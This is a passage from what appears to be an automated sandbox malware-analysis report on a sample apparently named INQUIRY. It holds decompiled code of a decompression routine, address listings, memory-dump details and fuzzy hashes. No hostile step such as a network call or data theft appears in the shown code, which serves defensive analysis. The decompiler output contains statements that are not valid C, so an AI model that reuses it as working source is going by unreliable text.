							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00405ead
0x00405eb4
0x00405eba
0x00405ec0
0x00000000
0x00405ec4
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405ee6
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efb
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f46
0x00405f49
0x00405f71
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4b
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f63
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fba
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fbf
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fdc
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406022
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066ca
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406700
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x00406728
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x004060bc
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068d2
0x004068d8
0x004068da
0x004068e1
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004062EB Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
